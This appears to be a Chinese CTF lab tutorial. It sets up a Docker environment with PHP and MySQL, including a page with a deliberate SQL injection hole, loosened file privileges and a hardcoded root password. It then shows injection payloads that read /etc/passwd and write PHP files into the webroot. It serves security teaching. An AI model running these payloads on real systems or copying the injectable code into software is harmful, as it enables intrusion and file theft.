1. 利用docker搭建环境
1. Dockerfile编写
#拉取镜像
FROM ubuntu:16.04
# 设置utf-8
ENV LANG c.UTF-8
# 设置非交互式环境
ENV DEBIAN_FRONTEND noninteractive
COPY ./docker/sources.list /etc/apt/sources.list
# 安装 apache2 mysql php 以及 php相关插件
RUN apt-get -y update && \
apt-get -yqq install php libapache2-mod-php && \
apt-get -yqq install mysql-server && \
apt-get -yqq install php-mysql php-curl && \
rm /var/www/html/*
# 移去apache2的列目录漏洞,并设置mysql可读写文件
RUN sed -i 's/Options Indexes FollowSymLinks/Options None/' /etc/apache2/apache2.conf && \
sed -i '$a secure_file_priv= ' /etc/mysql/mysql.conf.d/mysqld.cnf
ADD ./sources/CTF.tar /var/www/html/
COPY ./docker/ctf.sql /root/
# 修改权限
RUN chown www-data:www-data /var/www/html/* \
&& cd /var/www/html \
&& chmod 777 ./* .
COPY ./docker/start.sh /root/
RUN chmod +x /root/start.sh
ENTRYPOINT cd /root; ./start.sh
EXPOSE 80
2.start.sh
#!/bin/bash
sleep 1
service mysql restart
mysqladmin -u root password "Cdusec123456"
mysql -u root -pCdusec123456 < /root/ctf.sql
/usr/sbin/apache2ctl -D FOREGROUND
3.ctf.sql
CREATE DATABASE IF NOT EXISTS ctfC;
use ctfC;
create table IF NOT EXISTS admins (id int(10) PRIMARY KEY AUTO_INCREMENT,username varchar(100),password varchar(100));
insert admins values ('1','admin','flag{flag_is_not_there}');
insert admins values ('2','admin1','flag{flag_is_not_there}');
insert admins values ('3','admin2','flag{flag_is_not_there}');
insert admins values ('4','admin3','flag{flag_is_not_there}');
4.index.php
<?php
class Mysql {
public function __construct($servername = "127.0.0.1",$username ="root",$password = "Cdusec123456",$dbname = "ctfC")
{
$this->servername =$servername;
$this->username =$username;
$this->password =$password;
$this->dbname =$dbname;
$this->con = $this->conn();
}
public function __destruct()
{
// TODO: Implement __destruct() method.
$this->con->close();
}
public function conn()
{
$conn = new mysqli($this->servername, $this->username, $this->password, $this->dbname);
if ($conn->connect_error) {
die("连接失败: " . $conn->connect_error);
}else{
return $conn;
}
}
public function sel($id)
{
$sql = "SELECT * FROM admins WHERE id=$id";
$result = $this->con->query($sql);
if($result->num_rows > 0){
while($row = $result->fetch_assoc()) {
echo "id: " . $row['id']. " - Name: " . $row['username']. " -Password: " . $row['password']. "<br>";
}
return True;
}else{
return False;
}
}
}
$id =$_GET['id'];
$sql = new Mysql();
$re= $sql -> sel($id);
if ($re == True){
echo "Congratulations";
}else{
echo "NO";
}
2.文件写入条件
1.读写文件需要 secure_file_priv
权限
secure_file_priv = ''
//代表对文件写入没有限制secure_file_priv = NULL
//代表不能进行文件读写secure_file_priv=/var/tmp
//代表不能进行文件写入操作
# 修改/etc/mysql/mysql.cnf.d/mysqld.cnf 中 secure_file_priv 为 ''
sed -i '$a secure_file_priv= '/etc/mysql/mysql.conf.d/mysqld.cnf
2.读取文件
Load_file()
http://192.168.74.138:21101/?id=1 union select 1,'2',load_file('/etc/passwd') --+
3.写入文件
into outfile
or into dumpfile
//用于二进制文件
http://192.168.74.138:21101/?id=1 union select 1,'<?php phpinfo();?>',3 into outfile '/var/www/html/1.php' --+
http://192.168.74.138:21101/?id=1 union select 1,'<?php phpinfo();?>',3 into dumpfile '/var/www/html/5.php' --+
Q.E.D.